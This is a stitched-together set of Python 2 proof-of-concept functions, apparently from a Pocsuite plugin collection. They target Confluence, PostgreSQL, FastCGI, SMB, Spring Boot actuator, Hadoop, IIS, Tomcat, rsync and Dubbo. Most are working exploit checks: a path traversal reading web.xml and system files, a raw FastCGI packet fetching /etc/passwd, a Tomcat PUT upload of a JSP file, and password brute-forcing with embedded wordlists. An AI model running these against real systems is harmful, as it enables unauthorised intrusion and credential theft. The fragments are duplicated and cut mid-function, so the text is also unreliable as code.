def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output
def _verify(self): #调用指纹方法 result = {} output = Output() filename = "../web.xml" limitSize = 1000 paylaod = self.url + "/rest/tinymce/1/macro/preview" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Referer": self.url, "Content-Type": "application/json; charset=utf-8" } data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename r = requests.post(paylaod, data=data, headers=headers) if r.status_code == 200 and "</web-app>" in r.text: m = re.search('<web-app[\s\S]+<\/web-app>', r.text) if m: content = m.group()[:limitSize] result['VerifyInfo'] = {} result['VerifyInfo']['url'] = filename result['VerifyInfo']['Payload'] = content #print result return self.save_output(result)
def _verify(self): import psycopg2 #调用指纹方法 result = {} passwd = [ '123456', 'admin', 'root', 'password', '123123', '123', '1', '', '{user}', '{user}{user}', '{user}1', '{user}123', '{user}2016', '{user}2015', '{user}!', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin' ] import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', self.url) if len(_port) != 0: _host = url2ip(self.url)[0] _port = url2ip(self.url)[1] else: _host = url2ip(self.url) _port = "5432" print _host, _port import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host, _port)) #print 'Server port is OK!' except Exception: print 'port not alive' return self.save_output(result) sk.close() output = Output(self) message = '' for pwd in passwd: try: pwd = pwd.replace('{user}', 'postgres') conn = psycopg2.connect(host=_host, port=_port, user='******', password=pwd) message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format( _host, pwd) print "有弱口令漏洞" conn.close() result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['Payload'] = message break except Exception as e: print e print '[+]29 poc done' return self.save_output(result)
def _verify(self): ip = self.url.split(':')[1].replace('/', '') import socket #import psycopg2 #调用指纹方法 result = {} output = Output(self) message = '' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5.0) sock.connect((ip, 9000)) data = """ 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 """ data_s = '' for _ in data.split(): data_s += chr(int(_, 16)) sock.send(data_s) try: ret_data = sock.recv(1024) if ret_data.find(':root:') > 0: print ret_data print(ip + 'fastcgi read file vul') message = ip + 'fastcgi read file vul' result['VerifyInfo'] = {} result['VerifyInfo']['url'] = ip result['VerifyInfo']['Payload'] = message print '%s is vulnerable!' % ip return True else: print '没有发现 :root: 特征字' return False except Exception as e: print 'socket连接失败' pass sock.close() return self.save_output(result)
def parse_result(self, result): output = Output(self) if result: output.success(result) else: output.fail("Internet Nothing returned") return output
def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet noting return') return output
def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('not vulnerability') return output
def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('失败') return output
def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output
def parse_output(self,result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output
def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output
def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("someting error") return output
def parse_output(self, result): # parse output output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output
def parse_output(self, result): print 'parse_output' output = Output(self) if result: output.success(result) else: output.fail('failed connect') return output
def parse_attack(self, response): output = Output(self) result = {} if response: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = '%s' % self.url output.success(result) else: output.fail('Fail test') return output
def _verify(self): # 调用指纹方法 result = {} output = Output(self) import socket import binascii vul_ip = self.url vul_ip = vul_ip[7:] print vul_ip negotiate_protocol_request = binascii.unhexlify( "00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200" ) session_setup_request = binascii.unhexlify( "00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000" ) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(10) s.connect((vul_ip, 445)) s.send(negotiate_protocol_request) s.recv(1024) s.send(session_setup_request) data = s.recv(1024) user_id = data[32:34] tree_connect_andx_request = "000000%xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff000000000001001a00005c5c%s5c49504324003f3f3f3f3f00" % ( (58 + len(vul_ip)), user_id.encode('hex'), vul_ip.encode('hex')) s.send(binascii.unhexlify(tree_connect_andx_request)) data = s.recv(1024) allid = data[28:36] payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00" % allid.encode( 'hex') s.send(binascii.unhexlify(payload)) data = s.recv(1024) s.close() if "\x05\x02\x00\xc0" in data: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = vul_ip s.close() except Exception as e: print e print '[+]36 poc done' return self.save_output(result)
def _verify(self): #调用指纹方法 result = {} output = Output() payload = ['trace','env','health','info'] for i in payload: vul_url = '{}/{}'.format(self.url, i) try: resp = req.get(url=vul_url, timeput=3, verify=False) if resp.headers['Content-Type'] and 'application/json' in resp.headers['Content-Type'] and len(resp.content)> 500: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = vul_url result['VerifyInfo']['Payload'] = 'path:{}'.format(i) break except Exception as e: pass print '[+]58 poc done' return self.save_output(result)
def _verify(self): result = {} output = Output(self) target_ip = url2ip(self.url) url = urlparse.urlparse(self.url) port = url.port or 443 if check_poodle(target_ip, port): output.success(result) else: output.fail('Not support SSLv3 connection. Not Vulnerable') return output
def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) #生产报告错误,在这里记得 #data = result['VerifyInfo']['URL'] + result['VerifyInfo']['whoami'] + "\n" #with open('result.txt','a+') as f: # f.write(str(data)) else: output.fail() return output
def _verify(self): # 调用指纹方法 result={} output = Output(self) scan_ports = { "50070", #dfs.namenode.http-address "50470", #dfs.namenode.https-address "50105", #dfs.namenode.backup.http-address "50090", #dfs.namenode.secondary.http-address "50091", #dfs.namenode.secondary.https-address "50075", #dfs.datanode.http.address "50475", #dfs.datanode.https.address "8480", #dfs.journalnode.http-address "8088", #yarn.resourcemanager.webapp.address "8090", #yarn.resourcemanager.webapp.https.address "8042", #yarn.nodemanager.webapp.address "8188", #yarn.timeline-service.webapp.address "19888", #mapreduce.jobhistory.webapp.address "60010", #hbase.master.info.port, HMaster的http端口 "60030",#hbase.regionserver.info.port HRegionServer的http端口 } vul_port = [] for i in scan_ports: #print i vul_url = '%s:%s' % (self.url,i) try: response = req.get(str(vul_url), timeout=1).text #print response if "hbase" in response.lower() or\ "url=/rs-status" in response.lower() or\ "hadoop" in response.lower(): vul_port.append(i) except: #print e pass if vul_port.__len__() > 0: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['Payload'] = "port:" + str(vul_port) print '[+]28 poc done' return self.save_output(result)
def _verify(self): result = {} output = Output(self) # ip ip = url2ip(self.url) #port import re _port = re.findall(':(\d+)\s*', self.url) if len(_port) != 0: _port = url2ip(self.url)[1] else: _port = 80 import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2.0) sock.connect((ip, int(_port))) # ip port flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" sock.send(flag) try: data = sock.recv(1024) if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = ip result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul' return self.save_output(result) except: print '连接失败' pass sock.close() # print '-' * 18 + '\n' print data
def _verify(self): #ip = self.url.split(':')[1].replace('/', '') #import psycopg2 testurl = (self.url + '/myfile.jsp/').replace('//m', '/m') testdata = """<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>""" result = {} output = Output(self) message = '' print(testurl) try: r1 = req.put(testurl, testdata, timeout=3) #3秒超时 r2 = req.get(testurl.replace(".jsp/", ".jsp")) print('响应包长度:') print(r2.content.__len__()) if r2.content.find('successfully.') > 0: message = testurl + 'Tomcat uploadfile vulnerability' print(message) result['VerifyInfo'] = {} result['VerifyInfo']['url'] = testurl result['VerifyInfo']['Payload'] = testdata print '%s is vulnerable!' % testurl return True else: print '没有发现关键字:successfully. ' return False except Exception as e: print '连接失败' pass return self.save_output(result)
def _verify(self): import socket #调用指纹方法 result = {} output = Output(self) message = '' try: s = socket.socket() socket.setdefaulttimeout(1) #两秒超时 port = 873 ip = self.url.split(':')[1].replace('/', '') s.connect((ip, port)) print('Rsync未授权访问') message = 'Rsync 873端口 未授权访问' result['VerifyInfo'] = {} result['VerifyInfo']['url'] = ip result['VerifyInfo']['Payload'] = message except Exception as e: print(e) s.close() print '[+]30 poc done' return self.save_output(result)
def _verify(self): result = {} #获取漏洞url #如果设置端口则取端口,没有设置则为默认端口 import re vul_url = "%s" % self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else: _host = url2ip(vul_url) _port = "8080" vul_ip = "http://%s:%s" % (_host, _port) import hashlib # 会话保持 output = Output(self) file_name = "windows/win" BACKDIR_COUNT = 8 header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name} try: vulurl = vul_ip + '/plugin/credentials/.ini' vulurltest = req.get(vulurl, headers=header) if "MPEGVideo" in vulurltest.text: if vulurltest.text.find('version'): result['VerifyInfo'] = {} result['VerifyInfo']['url'] = vulurl result['VerifyInfo']['Payload'] = header except Exception as e: pass return self.save_output(result)
def _verify(self): # 调用指纹方法 result = {} output = Output(self) import socket import telnetlib import base64 # 默认端口 web 8080 telnet 7070 但是很多dubbo自定义了端口,以下是其他比较常见的dubbo可能存在的端口 unauth_ports = { #用于探测 1、直接未授权访问 2、basic 弱口令登录 "80", "443", "8080", #default port test demo 1.1.1.1 # "8081", # "8082", # "8083", # "8084", # "8086", "8088", "8888", # "8089", # "8090", "8000", # default pwd test :http://1.1.1.1:8000/ # "9080", # "9090", # "9999", # "18080", # "28080", } default_account = { #默认账号检测 default root/root(admin) guest /guest "root", #"admin", "guest", } default_pwd = { #默认密码检测 "root", #"admin", "guest", } telnet_ports = { "7070", #default port 1.1.1.1 # "1234", # "8000", "10001", # "9999", # "19999", # "29999", # "20000", # "18080", # "28080", # "6060", # "8084", # "12345", } vul_port = [] #step 1 http 以及弱口令 for p in unauth_ports: url = '%s:%s' % (self.url, p) try: resp = req.get(str(url), timeout=1) #print resp.text if "<title>dubbo</title>" in resp.text.lower(): vul_port.append(p) elif resp.headers[ "www-authenticate"] == "Basic realm=\"dubbo\"": #print "get basic" #vul_port.append(p) #构造弱口令爆破 for user in default_account: for pwd in default_pwd: verify_str = user + ":" + pwd #print verify_str verify_str = base64.b64encode(verify_str) basic_auth = { 'Authorization': 'BASIC ' + verify_str } #print verify_str httpreq = req.session() raa = httpreq.get(url, headers=basic_auth, timeout=1) #print raa.text #print raa.status_code if 200 == raa.status_code: #print "get weak pwd" py = p + ':(' + user + '|' + pwd + ')' vul_port.append(py) except Exception, e: #print e pass
# coding: utf-8
def _verify(self): result = {} output = Output(self) port = "" vul_url = '%s' % self.url password = [ '123456', 'admin', 'root', 'password', '123123', '123', '1', '', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin' ] user = ["root", "admin", "tomcat", "Tomcat", "test", "manager"] list_a = [8080, 8090, 9080, 9090, 80] #tomcat常见端口列表 for one_port in list_a: try: is_tomcat_url = ( vul_url + ":" + str(one_port)).strip("/").strip("/").strip(":") #"/manager/html").replace('//mana','/') print is_tomcat_url reponse = req.get(is_tomcat_url, timeout=3) if ("installed Tomcat. Congratulations!" in reponse.text): port = str(one_port) print '发现特征,确定Tomcat端口:' + port vul_url = is_tomcat_url print "确定vul_url" + vul_url break else: print "not:" + str(one_port) except Exception as e: print e pass if (port == ""): print '无漏洞,未发现tomcat端口' return self.save_output(result) #确定port和vul_url了 vul_url = vul_url + "/manager/html" print "final" + vul_url #http://1.1.1.1:9080:9080/manager/html import base64 #import time for u in user: for p in password: try: #time.sleep(2) header = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0", "Authorization": " Basic " + base64.b64encode(("%s:%s") % (u, p)) } print '当前 ' + u + ":" + p reponse = req.get(vul_url, timeout=5, headers=header) if ("Tomcat Web Application Manager" in reponse.text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = u + ":" + p except Exception as e: print e pass print '[+]34 poc done' return self.save_output(result)